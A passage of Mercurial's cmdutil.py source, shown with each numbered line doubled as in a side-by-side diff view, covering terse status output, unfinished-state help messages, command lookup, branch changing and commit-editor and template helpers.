422 statuses is a set of statuses of all files in this directory (this includes
422 statuses is a set of statuses of all files in this directory (this includes
423 all the files in all the subdirectories too)
423 all the files in all the subdirectories too)
424
424
425 files is a list of files which are direct child of this directory
425 files is a list of files which are direct child of this directory
426
426
427 subdirs is a dictionary of sub-directory name as the key and it's own
427 subdirs is a dictionary of sub-directory name as the key and it's own
428 dirnode object as the value
428 dirnode object as the value
429 """
429 """
430
430
431 def __init__(self, dirpath):
431 def __init__(self, dirpath):
432 self.path = dirpath
432 self.path = dirpath
433 self.statuses = set([])
433 self.statuses = set([])
434 self.files = []
434 self.files = []
435 self.subdirs = {}
435 self.subdirs = {}
436
436
437 def _addfileindir(self, filename, status):
437 def _addfileindir(self, filename, status):
438 """Add a file in this directory as a direct child."""
438 """Add a file in this directory as a direct child."""
439 self.files.append((filename, status))
439 self.files.append((filename, status))
440
440
441 def addfile(self, filename, status):
441 def addfile(self, filename, status):
442 """
442 """
443 Add a file to this directory or to its direct parent directory.
443 Add a file to this directory or to its direct parent directory.
444
444
445 If the file is not direct child of this directory, we traverse to the
445 If the file is not direct child of this directory, we traverse to the
446 directory of which this file is a direct child of and add the file
446 directory of which this file is a direct child of and add the file
447 there.
447 there.
448 """
448 """
449
449
450 # the filename contains a path separator, it means it's not the direct
450 # the filename contains a path separator, it means it's not the direct
451 # child of this directory
451 # child of this directory
452 if '/' in filename:
452 if '/' in filename:
453 subdir, filep = filename.split('/', 1)
453 subdir, filep = filename.split('/', 1)
454
454
455 # does the dirnode object for subdir exists
455 # does the dirnode object for subdir exists
456 if subdir not in self.subdirs:
456 if subdir not in self.subdirs:
457 subdirpath = pathutil.join(self.path, subdir)
457 subdirpath = pathutil.join(self.path, subdir)
458 self.subdirs[subdir] = dirnode(subdirpath)
458 self.subdirs[subdir] = dirnode(subdirpath)
459
459
460 # try adding the file in subdir
460 # try adding the file in subdir
461 self.subdirs[subdir].addfile(filep, status)
461 self.subdirs[subdir].addfile(filep, status)
462
462
463 else:
463 else:
464 self._addfileindir(filename, status)
464 self._addfileindir(filename, status)
465
465
466 if status not in self.statuses:
466 if status not in self.statuses:
467 self.statuses.add(status)
467 self.statuses.add(status)
468
468
469 def iterfilepaths(self):
469 def iterfilepaths(self):
470 """Yield (status, path) for files directly under this directory."""
470 """Yield (status, path) for files directly under this directory."""
471 for f, st in self.files:
471 for f, st in self.files:
472 yield st, pathutil.join(self.path, f)
472 yield st, pathutil.join(self.path, f)
473
473
474 def tersewalk(self, terseargs):
474 def tersewalk(self, terseargs):
475 """
475 """
476 Yield (status, path) obtained by processing the status of this
476 Yield (status, path) obtained by processing the status of this
477 dirnode.
477 dirnode.
478
478
479 terseargs is the string of arguments passed by the user with `--terse`
479 terseargs is the string of arguments passed by the user with `--terse`
480 flag.
480 flag.
481
481
482 Following are the cases which can happen:
482 Following are the cases which can happen:
483
483
484 1) All the files in the directory (including all the files in its
484 1) All the files in the directory (including all the files in its
485 subdirectories) share the same status and the user has asked us to terse
485 subdirectories) share the same status and the user has asked us to terse
486 that status. -> yield (status, dirpath). dirpath will end in '/'.
486 that status. -> yield (status, dirpath). dirpath will end in '/'.
487
487
488 2) Otherwise, we do following:
488 2) Otherwise, we do following:
489
489
490 a) Yield (status, filepath) for all the files which are in this
490 a) Yield (status, filepath) for all the files which are in this
491 directory (only the ones in this directory, not the subdirs)
491 directory (only the ones in this directory, not the subdirs)
492
492
493 b) Recurse the function on all the subdirectories of this
493 b) Recurse the function on all the subdirectories of this
494 directory
494 directory
495 """
495 """
496
496
497 if len(self.statuses) == 1:
497 if len(self.statuses) == 1:
498 onlyst = self.statuses.pop()
498 onlyst = self.statuses.pop()
499
499
500 # Making sure we terse only when the status abbreviation is
500 # Making sure we terse only when the status abbreviation is
501 # passed as terse argument
501 # passed as terse argument
502 if onlyst in terseargs:
502 if onlyst in terseargs:
503 yield onlyst, self.path + '/'
503 yield onlyst, self.path + '/'
504 return
504 return
505
505
506 # add the files to status list
506 # add the files to status list
507 for st, fpath in self.iterfilepaths():
507 for st, fpath in self.iterfilepaths():
508 yield st, fpath
508 yield st, fpath
509
509
510 #recurse on the subdirs
510 #recurse on the subdirs
511 for dirobj in self.subdirs.values():
511 for dirobj in self.subdirs.values():
512 for st, fpath in dirobj.tersewalk(terseargs):
512 for st, fpath in dirobj.tersewalk(terseargs):
513 yield st, fpath
513 yield st, fpath
514
514
515 def tersedir(statuslist, terseargs):
515 def tersedir(statuslist, terseargs):
516 """
516 """
517 Terse the status if all the files in a directory shares the same status.
517 Terse the status if all the files in a directory shares the same status.
518
518
519 statuslist is scmutil.status() object which contains a list of files for
519 statuslist is scmutil.status() object which contains a list of files for
520 each status.
520 each status.
521 terseargs is string which is passed by the user as the argument to `--terse`
521 terseargs is string which is passed by the user as the argument to `--terse`
522 flag.
522 flag.
523
523
524 The function makes a tree of objects of dirnode class, and at each node it
524 The function makes a tree of objects of dirnode class, and at each node it
525 stores the information required to know whether we can terse a certain
525 stores the information required to know whether we can terse a certain
526 directory or not.
526 directory or not.
527 """
527 """
528 # the order matters here as that is used to produce final list
528 # the order matters here as that is used to produce final list
529 allst = ('m', 'a', 'r', 'd', 'u', 'i', 'c')
529 allst = ('m', 'a', 'r', 'd', 'u', 'i', 'c')
530
530
531 # checking the argument validity
531 # checking the argument validity
532 for s in pycompat.bytestr(terseargs):
532 for s in pycompat.bytestr(terseargs):
533 if s not in allst:
533 if s not in allst:
534 raise error.Abort(_("'%s' not recognized") % s)
534 raise error.Abort(_("'%s' not recognized") % s)
535
535
536 # creating a dirnode object for the root of the repo
536 # creating a dirnode object for the root of the repo
537 rootobj = dirnode('')
537 rootobj = dirnode('')
538 pstatus = ('modified', 'added', 'deleted', 'clean', 'unknown',
538 pstatus = ('modified', 'added', 'deleted', 'clean', 'unknown',
539 'ignored', 'removed')
539 'ignored', 'removed')
540
540
541 tersedict = {}
541 tersedict = {}
542 for attrname in pstatus:
542 for attrname in pstatus:
543 statuschar = attrname[0:1]
543 statuschar = attrname[0:1]
544 for f in getattr(statuslist, attrname):
544 for f in getattr(statuslist, attrname):
545 rootobj.addfile(f, statuschar)
545 rootobj.addfile(f, statuschar)
546 tersedict[statuschar] = []
546 tersedict[statuschar] = []
547
547
548 # we won't be tersing the root dir, so add files in it
548 # we won't be tersing the root dir, so add files in it
549 for st, fpath in rootobj.iterfilepaths():
549 for st, fpath in rootobj.iterfilepaths():
550 tersedict[st].append(fpath)
550 tersedict[st].append(fpath)
551
551
552 # process each sub-directory and build tersedict
552 # process each sub-directory and build tersedict
553 for subdir in rootobj.subdirs.values():
553 for subdir in rootobj.subdirs.values():
554 for st, f in subdir.tersewalk(terseargs):
554 for st, f in subdir.tersewalk(terseargs):
555 tersedict[st].append(f)
555 tersedict[st].append(f)
556
556
557 tersedlist = []
557 tersedlist = []
558 for st in allst:
558 for st in allst:
559 tersedict[st].sort()
559 tersedict[st].sort()
560 tersedlist.append(tersedict[st])
560 tersedlist.append(tersedict[st])
561
561
562 return tersedlist
562 return tersedlist
563
563
564 def _commentlines(raw):
564 def _commentlines(raw):
565 '''Surround lineswith a comment char and a new line'''
565 '''Surround lineswith a comment char and a new line'''
566 lines = raw.splitlines()
566 lines = raw.splitlines()
567 commentedlines = ['# %s' % line for line in lines]
567 commentedlines = ['# %s' % line for line in lines]
568 return '\n'.join(commentedlines) + '\n'
568 return '\n'.join(commentedlines) + '\n'
569
569
570 def _conflictsmsg(repo):
570 def _conflictsmsg(repo):
571 mergestate = mergemod.mergestate.read(repo)
571 mergestate = mergemod.mergestate.read(repo)
572 if not mergestate.active():
572 if not mergestate.active():
573 return
573 return
574
574
575 m = scmutil.match(repo[None])
575 m = scmutil.match(repo[None])
576 unresolvedlist = [f for f in mergestate.unresolved() if m(f)]
576 unresolvedlist = [f for f in mergestate.unresolved() if m(f)]
577 if unresolvedlist:
577 if unresolvedlist:
578 mergeliststr = '\n'.join(
578 mergeliststr = '\n'.join(
579 [' %s' % util.pathto(repo.root, pycompat.getcwd(), path)
579 [' %s' % util.pathto(repo.root, pycompat.getcwd(), path)
580 for path in unresolvedlist])
580 for path in unresolvedlist])
581 msg = _('''Unresolved merge conflicts:
581 msg = _('''Unresolved merge conflicts:
582
582
583 %s
583 %s
584
584
585 To mark files as resolved: hg resolve --mark FILE''') % mergeliststr
585 To mark files as resolved: hg resolve --mark FILE''') % mergeliststr
586 else:
586 else:
587 msg = _('No unresolved merge conflicts.')
587 msg = _('No unresolved merge conflicts.')
588
588
589 return _commentlines(msg)
589 return _commentlines(msg)
590
590
591 def _helpmessage(continuecmd, abortcmd):
591 def _helpmessage(continuecmd, abortcmd):
592 msg = _('To continue: %s\n'
592 msg = _('To continue: %s\n'
593 'To abort: %s') % (continuecmd, abortcmd)
593 'To abort: %s') % (continuecmd, abortcmd)
594 return _commentlines(msg)
594 return _commentlines(msg)
595
595
596 def _rebasemsg():
596 def _rebasemsg():
597 return _helpmessage('hg rebase --continue', 'hg rebase --abort')
597 return _helpmessage('hg rebase --continue', 'hg rebase --abort')
598
598
599 def _histeditmsg():
599 def _histeditmsg():
600 return _helpmessage('hg histedit --continue', 'hg histedit --abort')
600 return _helpmessage('hg histedit --continue', 'hg histedit --abort')
601
601
602 def _unshelvemsg():
602 def _unshelvemsg():
603 return _helpmessage('hg unshelve --continue', 'hg unshelve --abort')
603 return _helpmessage('hg unshelve --continue', 'hg unshelve --abort')
604
604
605 def _updatecleanmsg(dest=None):
605 def _updatecleanmsg(dest=None):
606 warning = _('warning: this will discard uncommitted changes')
606 warning = _('warning: this will discard uncommitted changes')
607 return 'hg update --clean %s (%s)' % (dest or '.', warning)
607 return 'hg update --clean %s (%s)' % (dest or '.', warning)
608
608
609 def _graftmsg():
609 def _graftmsg():
610 # tweakdefaults requires `update` to have a rev hence the `.`
610 # tweakdefaults requires `update` to have a rev hence the `.`
611 return _helpmessage('hg graft --continue', _updatecleanmsg())
611 return _helpmessage('hg graft --continue', _updatecleanmsg())
612
612
613 def _mergemsg():
613 def _mergemsg():
614 # tweakdefaults requires `update` to have a rev hence the `.`
614 # tweakdefaults requires `update` to have a rev hence the `.`
615 return _helpmessage('hg commit', _updatecleanmsg())
615 return _helpmessage('hg commit', _updatecleanmsg())
616
616
617 def _bisectmsg():
617 def _bisectmsg():
618 msg = _('To mark the changeset good: hg bisect --good\n'
618 msg = _('To mark the changeset good: hg bisect --good\n'
619 'To mark the changeset bad: hg bisect --bad\n'
619 'To mark the changeset bad: hg bisect --bad\n'
620 'To abort: hg bisect --reset\n')
620 'To abort: hg bisect --reset\n')
621 return _commentlines(msg)
621 return _commentlines(msg)
622
622
623 def fileexistspredicate(filename):
623 def fileexistspredicate(filename):
624 return lambda repo: repo.vfs.exists(filename)
624 return lambda repo: repo.vfs.exists(filename)
625
625
626 def _mergepredicate(repo):
626 def _mergepredicate(repo):
627 return len(repo[None].parents()) > 1
627 return len(repo[None].parents()) > 1
628
628
629 STATES = (
629 STATES = (
630 # (state, predicate to detect states, helpful message function)
630 # (state, predicate to detect states, helpful message function)
631 ('histedit', fileexistspredicate('histedit-state'), _histeditmsg),
631 ('histedit', fileexistspredicate('histedit-state'), _histeditmsg),
632 ('bisect', fileexistspredicate('bisect.state'), _bisectmsg),
632 ('bisect', fileexistspredicate('bisect.state'), _bisectmsg),
633 ('graft', fileexistspredicate('graftstate'), _graftmsg),
633 ('graft', fileexistspredicate('graftstate'), _graftmsg),
634 ('unshelve', fileexistspredicate('shelvedstate'), _unshelvemsg),
634 ('unshelve', fileexistspredicate('shelvedstate'), _unshelvemsg),
635 ('rebase', fileexistspredicate('rebasestate'), _rebasemsg),
635 ('rebase', fileexistspredicate('rebasestate'), _rebasemsg),
636 # The merge state is part of a list that will be iterated over.
636 # The merge state is part of a list that will be iterated over.
637 # They need to be last because some of the other unfinished states may also
637 # They need to be last because some of the other unfinished states may also
638 # be in a merge or update state (eg. rebase, histedit, graft, etc).
638 # be in a merge or update state (eg. rebase, histedit, graft, etc).
639 # We want those to have priority.
639 # We want those to have priority.
640 ('merge', _mergepredicate, _mergemsg),
640 ('merge', _mergepredicate, _mergemsg),
641 )
641 )
642
642
643 def _getrepostate(repo):
643 def _getrepostate(repo):
644 # experimental config: commands.status.skipstates
644 # experimental config: commands.status.skipstates
645 skip = set(repo.ui.configlist('commands', 'status.skipstates'))
645 skip = set(repo.ui.configlist('commands', 'status.skipstates'))
646 for state, statedetectionpredicate, msgfn in STATES:
646 for state, statedetectionpredicate, msgfn in STATES:
647 if state in skip:
647 if state in skip:
648 continue
648 continue
649 if statedetectionpredicate(repo):
649 if statedetectionpredicate(repo):
650 return (state, statedetectionpredicate, msgfn)
650 return (state, statedetectionpredicate, msgfn)
651
651
652 def morestatus(repo, fm):
652 def morestatus(repo, fm):
653 statetuple = _getrepostate(repo)
653 statetuple = _getrepostate(repo)
654 label = 'status.morestatus'
654 label = 'status.morestatus'
655 if statetuple:
655 if statetuple:
656 fm.startitem()
656 fm.startitem()
657 state, statedetectionpredicate, helpfulmsg = statetuple
657 state, statedetectionpredicate, helpfulmsg = statetuple
658 statemsg = _('The repository is in an unfinished *%s* state.') % state
658 statemsg = _('The repository is in an unfinished *%s* state.') % state
659 fm.write('statemsg', '%s\n', _commentlines(statemsg), label=label)
659 fm.write('statemsg', '%s\n', _commentlines(statemsg), label=label)
660 conmsg = _conflictsmsg(repo)
660 conmsg = _conflictsmsg(repo)
661 if conmsg:
661 if conmsg:
662 fm.write('conflictsmsg', '%s\n', conmsg, label=label)
662 fm.write('conflictsmsg', '%s\n', conmsg, label=label)
663 if helpfulmsg:
663 if helpfulmsg:
664 helpmsg = helpfulmsg()
664 helpmsg = helpfulmsg()
665 fm.write('helpmsg', '%s\n', helpmsg, label=label)
665 fm.write('helpmsg', '%s\n', helpmsg, label=label)
666
666
667 def findpossible(cmd, table, strict=False):
667 def findpossible(cmd, table, strict=False):
668 """
668 """
669 Return cmd -> (aliases, command table entry)
669 Return cmd -> (aliases, command table entry)
670 for each matching command.
670 for each matching command.
671 Return debug commands (or their aliases) only if no normal command matches.
671 Return debug commands (or their aliases) only if no normal command matches.
672 """
672 """
673 choice = {}
673 choice = {}
674 debugchoice = {}
674 debugchoice = {}
675
675
676 if cmd in table:
676 if cmd in table:
677 # short-circuit exact matches, "log" alias beats "^log|history"
677 # short-circuit exact matches, "log" alias beats "^log|history"
678 keys = [cmd]
678 keys = [cmd]
679 else:
679 else:
680 keys = table.keys()
680 keys = table.keys()
681
681
682 allcmds = []
682 allcmds = []
683 for e in keys:
683 for e in keys:
684 aliases = parsealiases(e)
684 aliases = parsealiases(e)
685 allcmds.extend(aliases)
685 allcmds.extend(aliases)
686 found = None
686 found = None
687 if cmd in aliases:
687 if cmd in aliases:
688 found = cmd
688 found = cmd
689 elif not strict:
689 elif not strict:
690 for a in aliases:
690 for a in aliases:
691 if a.startswith(cmd):
691 if a.startswith(cmd):
692 found = a
692 found = a
693 break
693 break
694 if found is not None:
694 if found is not None:
695 if aliases[0].startswith("debug") or found.startswith("debug"):
695 if aliases[0].startswith("debug") or found.startswith("debug"):
696 debugchoice[found] = (aliases, table[e])
696 debugchoice[found] = (aliases, table[e])
697 else:
697 else:
698 choice[found] = (aliases, table[e])
698 choice[found] = (aliases, table[e])
699
699
700 if not choice and debugchoice:
700 if not choice and debugchoice:
701 choice = debugchoice
701 choice = debugchoice
702
702
703 return choice, allcmds
703 return choice, allcmds
704
704
705 def findcmd(cmd, table, strict=True):
705 def findcmd(cmd, table, strict=True):
706 """Return (aliases, command table entry) for command string."""
706 """Return (aliases, command table entry) for command string."""
707 choice, allcmds = findpossible(cmd, table, strict)
707 choice, allcmds = findpossible(cmd, table, strict)
708
708
709 if cmd in choice:
709 if cmd in choice:
710 return choice[cmd]
710 return choice[cmd]
711
711
712 if len(choice) > 1:
712 if len(choice) > 1:
713 clist = sorted(choice)
713 clist = sorted(choice)
714 raise error.AmbiguousCommand(cmd, clist)
714 raise error.AmbiguousCommand(cmd, clist)
715
715
716 if choice:
716 if choice:
717 return list(choice.values())[0]
717 return list(choice.values())[0]
718
718
719 raise error.UnknownCommand(cmd, allcmds)
719 raise error.UnknownCommand(cmd, allcmds)
720
720
721 def changebranch(ui, repo, revs, label):
721 def changebranch(ui, repo, revs, label):
722 """ Change the branch name of given revs to label """
722 """ Change the branch name of given revs to label """
723
723
724 with repo.wlock(), repo.lock(), repo.transaction('branches'):
724 with repo.wlock(), repo.lock(), repo.transaction('branches'):
725 # abort in case of uncommitted merge or dirty wdir
725 # abort in case of uncommitted merge or dirty wdir
726 bailifchanged(repo)
726 bailifchanged(repo)
727 revs = scmutil.revrange(repo, revs)
727 revs = scmutil.revrange(repo, revs)
728 if not revs:
728 if not revs:
729 raise error.Abort("empty revision set")
729 raise error.Abort("empty revision set")
730 roots = repo.revs('roots(%ld)', revs)
730 roots = repo.revs('roots(%ld)', revs)
731 if len(roots) > 1:
731 if len(roots) > 1:
732 raise error.Abort(_("cannot change branch of non-linear revisions"))
732 raise error.Abort(_("cannot change branch of non-linear revisions"))
733 rewriteutil.precheck(repo, revs, 'change branch of')
733 rewriteutil.precheck(repo, revs, 'change branch of')
734
734
735 root = repo[roots.first()]
735 root = repo[roots.first()]
736 if not root.p1().branch() == label and label in repo.branchmap():
736 if not root.p1().branch() == label and label in repo.branchmap():
737 raise error.Abort(_("a branch of the same name already exists"))
737 raise error.Abort(_("a branch of the same name already exists"))
738
738
739 if repo.revs('merge() and %ld', revs):
739 if repo.revs('merge() and %ld', revs):
740 raise error.Abort(_("cannot change branch of a merge commit"))
740 raise error.Abort(_("cannot change branch of a merge commit"))
741 if repo.revs('obsolete() and %ld', revs):
741 if repo.revs('obsolete() and %ld', revs):
742 raise error.Abort(_("cannot change branch of a obsolete changeset"))
742 raise error.Abort(_("cannot change branch of a obsolete changeset"))
743
743
744 # make sure only topological heads
744 # make sure only topological heads
745 if repo.revs('heads(%ld) - head()', revs):
745 if repo.revs('heads(%ld) - head()', revs):
746 raise error.Abort(_("cannot change branch in middle of a stack"))
746 raise error.Abort(_("cannot change branch in middle of a stack"))
747
747
748 replacements = {}
748 replacements = {}
749 # avoid import cycle mercurial.cmdutil -> mercurial.context ->
749 # avoid import cycle mercurial.cmdutil -> mercurial.context ->
750 # mercurial.subrepo -> mercurial.cmdutil
750 # mercurial.subrepo -> mercurial.cmdutil
751 from . import context
751 from . import context
752 for rev in revs:
752 for rev in revs:
753 ctx = repo[rev]
753 ctx = repo[rev]
754 oldbranch = ctx.branch()
754 oldbranch = ctx.branch()
755 # check if ctx has same branch
755 # check if ctx has same branch
756 if oldbranch == label:
756 if oldbranch == label:
757 continue
757 continue
758
758
759 def filectxfn(repo, newctx, path):
759 def filectxfn(repo, newctx, path):
760 try:
760 try:
761 return ctx[path]
761 return ctx[path]
762 except error.ManifestLookupError:
762 except error.ManifestLookupError:
763 return None
763 return None
764
764
765 ui.debug("changing branch of '%s' from '%s' to '%s'\n"
765 ui.debug("changing branch of '%s' from '%s' to '%s'\n"
766 % (hex(ctx.node()), oldbranch, label))
766 % (hex(ctx.node()), oldbranch, label))
767 extra = ctx.extra()
767 extra = ctx.extra()
768 extra['branch_change'] = hex(ctx.node())
768 extra['branch_change'] = hex(ctx.node())
769 # While changing branch of set of linear commits, make sure that
769 # While changing branch of set of linear commits, make sure that
770 # we base our commits on new parent rather than old parent which
770 # we base our commits on new parent rather than old parent which
771 # was obsoleted while changing the branch
771 # was obsoleted while changing the branch
772 p1 = ctx.p1().node()
772 p1 = ctx.p1().node()
773 p2 = ctx.p2().node()
773 p2 = ctx.p2().node()
774 if p1 in replacements:
774 if p1 in replacements:
775 p1 = replacements[p1][0]
775 p1 = replacements[p1][0]
776 if p2 in replacements:
776 if p2 in replacements:
777 p2 = replacements[p2][0]
777 p2 = replacements[p2][0]
778
778
779 mc = context.memctx(repo, (p1, p2),
779 mc = context.memctx(repo, (p1, p2),
780 ctx.description(),
780 ctx.description(),
781 ctx.files(),
781 ctx.files(),
782 filectxfn,
782 filectxfn,
783 user=ctx.user(),
783 user=ctx.user(),
784 date=ctx.date(),
784 date=ctx.date(),
785 extra=extra,
785 extra=extra,
786 branch=label)
786 branch=label)
787
787
788 newnode = repo.commitctx(mc)
788 newnode = repo.commitctx(mc)
789 replacements[ctx.node()] = (newnode,)
789 replacements[ctx.node()] = (newnode,)
790 ui.debug('new node id is %s\n' % hex(newnode))
790 ui.debug('new node id is %s\n' % hex(newnode))
791
791
792 # create obsmarkers and move bookmarks
792 # create obsmarkers and move bookmarks
793 scmutil.cleanupnodes(repo, replacements, 'branch-change', fixphase=True)
793 scmutil.cleanupnodes(repo, replacements, 'branch-change', fixphase=True)
794
794
795 # move the working copy too
795 # move the working copy too
796 wctx = repo[None]
796 wctx = repo[None]
797 # in-progress merge is a bit too complex for now.
797 # in-progress merge is a bit too complex for now.
798 if len(wctx.parents()) == 1:
798 if len(wctx.parents()) == 1:
799 newid = replacements.get(wctx.p1().node())
799 newid = replacements.get(wctx.p1().node())
800 if newid is not None:
800 if newid is not None:
801 # avoid import cycle mercurial.cmdutil -> mercurial.hg ->
801 # avoid import cycle mercurial.cmdutil -> mercurial.hg ->
802 # mercurial.cmdutil
802 # mercurial.cmdutil
803 from . import hg
803 from . import hg
804 hg.update(repo, newid[0], quietempty=True)
804 hg.update(repo, newid[0], quietempty=True)
805
805
806 ui.status(_("changed branch on %d changesets\n") % len(replacements))
806 ui.status(_("changed branch on %d changesets\n") % len(replacements))
807
807
808 def findrepo(p):
808 def findrepo(p):
809 while not os.path.isdir(os.path.join(p, ".hg")):
809 while not os.path.isdir(os.path.join(p, ".hg")):
810 oldp, p = p, os.path.dirname(p)
810 oldp, p = p, os.path.dirname(p)
811 if p == oldp:
811 if p == oldp:
812 return None
812 return None
813
813
814 return p
814 return p
815
815
816 def bailifchanged(repo, merge=True, hint=None):
816 def bailifchanged(repo, merge=True, hint=None):
817 """ enforce the precondition that working directory must be clean.
817 """ enforce the precondition that working directory must be clean.
818
818
819 'merge' can be set to false if a pending uncommitted merge should be
819 'merge' can be set to false if a pending uncommitted merge should be
820 ignored (such as when 'update --check' runs).
820 ignored (such as when 'update --check' runs).
821
821
822 'hint' is the usual hint given to Abort exception.
822 'hint' is the usual hint given to Abort exception.
823 """
823 """
824
824
825 if merge and repo.dirstate.p2() != nullid:
825 if merge and repo.dirstate.p2() != nullid:
826 raise error.Abort(_('outstanding uncommitted merge'), hint=hint)
826 raise error.Abort(_('outstanding uncommitted merge'), hint=hint)
827 modified, added, removed, deleted = repo.status()[:4]
827 modified, added, removed, deleted = repo.status()[:4]
828 if modified or added or removed or deleted:
828 if modified or added or removed or deleted:
829 raise error.Abort(_('uncommitted changes'), hint=hint)
829 raise error.Abort(_('uncommitted changes'), hint=hint)
830 ctx = repo[None]
830 ctx = repo[None]
831 for s in sorted(ctx.substate):
831 for s in sorted(ctx.substate):
832 ctx.sub(s).bailifchanged(hint=hint)
832 ctx.sub(s).bailifchanged(hint=hint)
833
833
834 def logmessage(ui, opts):
834 def logmessage(ui, opts):
835 """ get the log message according to -m and -l option """
835 """ get the log message according to -m and -l option """
836 message = opts.get('message')
836 message = opts.get('message')
837 logfile = opts.get('logfile')
837 logfile = opts.get('logfile')
838
838
839 if message and logfile:
839 if message and logfile:
840 raise error.Abort(_('options --message and --logfile are mutually '
840 raise error.Abort(_('options --message and --logfile are mutually '
841 'exclusive'))
841 'exclusive'))
842 if not message and logfile:
842 if not message and logfile:
843 try:
843 try:
844 if isstdiofilename(logfile):
844 if isstdiofilename(logfile):
845 message = ui.fin.read()
845 message = ui.fin.read()
846 else:
846 else:
847 message = '\n'.join(util.readfile(logfile).splitlines())
847 message = '\n'.join(util.readfile(logfile).splitlines())
848 except IOError as inst:
848 except IOError as inst:
849 raise error.Abort(_("can't read commit message '%s': %s") %
849 raise error.Abort(_("can't read commit message '%s': %s") %
850 (logfile, encoding.strtolocal(inst.strerror)))
850 (logfile, encoding.strtolocal(inst.strerror)))
851 return message
851 return message
852
852
853 def mergeeditform(ctxorbool, baseformname):
853 def mergeeditform(ctxorbool, baseformname):
854 """return appropriate editform name (referencing a committemplate)
854 """return appropriate editform name (referencing a committemplate)
855
855
856 'ctxorbool' is either a ctx to be committed, or a bool indicating whether
856 'ctxorbool' is either a ctx to be committed, or a bool indicating whether
857 merging is committed.
857 merging is committed.
858
858
859 This returns baseformname with '.merge' appended if it is a merge,
859 This returns baseformname with '.merge' appended if it is a merge,
860 otherwise '.normal' is appended.
860 otherwise '.normal' is appended.
861 """
861 """
862 if isinstance(ctxorbool, bool):
862 if isinstance(ctxorbool, bool):
863 if ctxorbool:
863 if ctxorbool:
864 return baseformname + ".merge"
864 return baseformname + ".merge"
865 elif 1 < len(ctxorbool.parents()):
865 elif 1 < len(ctxorbool.parents()):
866 return baseformname + ".merge"
866 return baseformname + ".merge"
867
867
868 return baseformname + ".normal"
868 return baseformname + ".normal"
869
869
870 def getcommiteditor(edit=False, finishdesc=None, extramsg=None,
870 def getcommiteditor(edit=False, finishdesc=None, extramsg=None,
871 editform='', **opts):
871 editform='', **opts):
872 """get appropriate commit message editor according to '--edit' option
872 """get appropriate commit message editor according to '--edit' option
873
873
874 'finishdesc' is a function to be called with edited commit message
874 'finishdesc' is a function to be called with edited commit message
875 (= 'description' of the new changeset) just after editing, but
875 (= 'description' of the new changeset) just after editing, but
876 before checking empty-ness. It should return actual text to be
876 before checking empty-ness. It should return actual text to be
877 stored into history. This allows to change description before
877 stored into history. This allows to change description before
878 storing.
878 storing.
879
879
880 'extramsg' is a extra message to be shown in the editor instead of
880 'extramsg' is a extra message to be shown in the editor instead of
881 'Leave message empty to abort commit' line. 'HG: ' prefix and EOL
881 'Leave message empty to abort commit' line. 'HG: ' prefix and EOL
882 is automatically added.
882 is automatically added.
883
883
884 'editform' is a dot-separated list of names, to distinguish
884 'editform' is a dot-separated list of names, to distinguish
885 the purpose of commit text editing.
885 the purpose of commit text editing.
886
886
887 'getcommiteditor' returns 'commitforceeditor' regardless of
887 'getcommiteditor' returns 'commitforceeditor' regardless of
888 'edit', if one of 'finishdesc' or 'extramsg' is specified, because
888 'edit', if one of 'finishdesc' or 'extramsg' is specified, because
889 they are specific for usage in MQ.
889 they are specific for usage in MQ.
890 """
890 """
891 if edit or finishdesc or extramsg:
891 if edit or finishdesc or extramsg:
892 return lambda r, c, s: commitforceeditor(r, c, s,
892 return lambda r, c, s: commitforceeditor(r, c, s,
893 finishdesc=finishdesc,
893 finishdesc=finishdesc,
894 extramsg=extramsg,
894 extramsg=extramsg,
895 editform=editform)
895 editform=editform)
896 elif editform:
896 elif editform:
897 return lambda r, c, s: commiteditor(r, c, s, editform=editform)
897 return lambda r, c, s: commiteditor(r, c, s, editform=editform)
898 else:
898 else:
899 return commiteditor
899 return commiteditor
900
900
901 def _escapecommandtemplate(tmpl):
901 def _escapecommandtemplate(tmpl):
902 parts = []
902 parts = []
903 for typ, start, end in templater.scantemplate(tmpl, raw=True):
903 for typ, start, end in templater.scantemplate(tmpl, raw=True):
904 if typ == b'string':
904 if typ == b'string':
905 parts.append(stringutil.escapestr(tmpl[start:end]))
905 parts.append(stringutil.escapestr(tmpl[start:end]))
906 else:
906 else:
907 parts.append(tmpl[start:end])
907 parts.append(tmpl[start:end])
908 return b''.join(parts)
908 return b''.join(parts)
909
909
910 def rendercommandtemplate(ui, tmpl, props):
910 def rendercommandtemplate(ui, tmpl, props):
911 r"""Expand a literal template 'tmpl' in a way suitable for command line
911 r"""Expand a literal template 'tmpl' in a way suitable for command line
912
912
913 '\' in outermost string is not taken as an escape character because it
913 '\' in outermost string is not taken as an escape character because it
914 is a directory separator on Windows.
914 is a directory separator on Windows.
915
915
916 >>> from . import ui as uimod
916 >>> from . import ui as uimod
917 >>> ui = uimod.ui()
917 >>> ui = uimod.ui()
918 >>> rendercommandtemplate(ui, b'c:\\{path}', {b'path': b'foo'})
918 >>> rendercommandtemplate(ui, b'c:\\{path}', {b'path': b'foo'})
919 'c:\\foo'
919 'c:\\foo'
920 >>> rendercommandtemplate(ui, b'{"c:\\{path}"}', {'path': b'foo'})
920 >>> rendercommandtemplate(ui, b'{"c:\\{path}"}', {'path': b'foo'})
921 'c:{path}'
921 'c:{path}'
922 """
922 """
923 if not tmpl:
923 if not tmpl:
924 return tmpl
924 return tmpl
925 t = formatter.maketemplater(ui, _escapecommandtemplate(tmpl))
925 t = formatter.maketemplater(ui, _escapecommandtemplate(tmpl))
926 return t.renderdefault(props)
926 return t.renderdefault(props)
927
927
928 def rendertemplate(ctx, tmpl, props=None):
928 def rendertemplate(ctx, tmpl, props=None):
929 """Expand a literal template 'tmpl' byte-string against one changeset
929 """Expand a literal template 'tmpl' byte-string against one changeset
930
930
931 Each props item must be a stringify-able value or a callable returning
931 Each props item must be a stringify-able value or a callable returning
932 such value, i.e. no bare list nor dict should be passed.
932 such value, i.e. no bare list nor dict should be passed.
933 """
933 """
934 repo = ctx.repo()
934 repo = ctx.repo()
935 tres = formatter.templateresources(repo.ui, repo)
935 tres = formatter.templateresources(repo.ui, repo)
936 t = formatter.maketemplater(repo.ui, tmpl, defaults=templatekw.keywords,
936 t = formatter.maketemplater(repo.ui, tmpl, defaults=templatekw.keywords,
937 resources=tres)
937 resources=tres)
938 mapping = {'ctx': ctx}
938 mapping = {'ctx': ctx}
939 if props:
939 if props:
940 mapping.update(props)
940 mapping.update(props)
941 return t.renderdefault(mapping)
941 return t.renderdefault(mapping)
942
942
943 def _buildfntemplate(pat, total=None, seqno=None, revwidth=None, pathname=None):
943 def _buildfntemplate(pat, total=None, seqno=None, revwidth=None, pathname=None):
944 r"""Convert old-style filename format string to template string
944 r"""Convert old-style filename format string to template string
945
